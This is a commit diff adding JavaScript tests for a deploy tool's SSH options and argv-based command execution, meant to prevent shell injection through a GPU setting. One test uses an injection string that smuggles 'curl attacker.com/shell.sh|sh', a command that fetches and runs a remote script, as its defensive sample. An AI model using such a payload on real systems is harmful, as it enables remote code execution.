test: add argv builder and GPU injection prevention tests

brianwtaylor · brianwtaylor · commit 4710a70ba16c · 2026-03-17T13:24:55.000-07:00
Signed-off-by: Brian Taylor &lt;brian.taylor818@gmail.com&gt;
diff --git a/test/deploy.test.js b/test/deploy.test.js
@@ -123,4 +123,55 @@ describe("deploy helpers", () => {
       assert.equal(out, "$(whoami)");
     });
   });
+
+  describe("runSsh", () => {
+    // We can't call runSsh directly (it calls runArgv which exits on failure),
+    // but we can verify the SSH_OPTS constants and the argv construction pattern
+
+    it("SSH_OPTS contains accept-new and LogLevel=ERROR", () => {
+      assert.deepEqual(SSH_OPTS, [
+        "-o", "StrictHostKeyChecking=accept-new",
+        "-o", "LogLevel=ERROR",
+      ]);
+    });
+
+    it("SSH_OPTS does not contain StrictHostKeyChecking=no", () => {
+      const joined = SSH_OPTS.join(" ");
+      assert.ok(!joined.includes("StrictHostKeyChecking=no"));
+    });
+  });
+
+  describe("runArgv security properties", () => {
+    it("argv arrays pass sandbox names with hyphens literally", () => {
+      const r = spawnSync("echo", ["my-assistant"], { encoding: "utf-8", stdio: "pipe" });
+      assert.equal(r.stdout.trim(), "my-assistant");
+    });
+
+    it("argv arrays pass GPU specs with colons literally", () => {
+      const r = spawnSync("echo", ["a2-highgpu-1g:nvidia-tesla-a100:1"], { encoding: "utf-8", stdio: "pipe" });
+      assert.equal(r.stdout.trim(), "a2-highgpu-1g:nvidia-tesla-a100:1");
+    });
+
+    it("argv prevents NEMOCLAW_GPU injection via brev create", () => {
+      // Simulate what would happen if NEMOCLAW_GPU contained injection
+      const maliciousGpu = 'a100"; curl attacker.com/shell.sh|sh; echo "';
+      const r = spawnSync("echo", ["--gpu", maliciousGpu], { encoding: "utf-8", stdio: "pipe" });
+      // With argv, the entire string is one argument — no shell interpretation.
+      // "attacker" appears in stdout as literal text (not executed).
+      // The key assertion: the entire payload is passed through verbatim as
+      // a single argv element, proving no shell splitting or interpretation.
+      assert.ok(r.stdout.includes(maliciousGpu));
+      assert.equal(r.stdout.trim(), `--gpu ${maliciousGpu}`);
+    });
+
+    it("argv passes file paths with spaces literally", () => {
+      const r = spawnSync("echo", ["/path/with spaces/file.txt"], { encoding: "utf-8", stdio: "pipe" });
+      assert.equal(r.stdout.trim(), "/path/with spaces/file.txt");
+    });
+
+    it("argv passes environment variable syntax literally", () => {
+      const r = spawnSync("echo", ["NVIDIA_API_KEY=${SECRET}"], { encoding: "utf-8", stdio: "pipe" });
+      assert.equal(r.stdout.trim(), "NVIDIA_API_KEY=${SECRET}");
+    });
+  });
 });
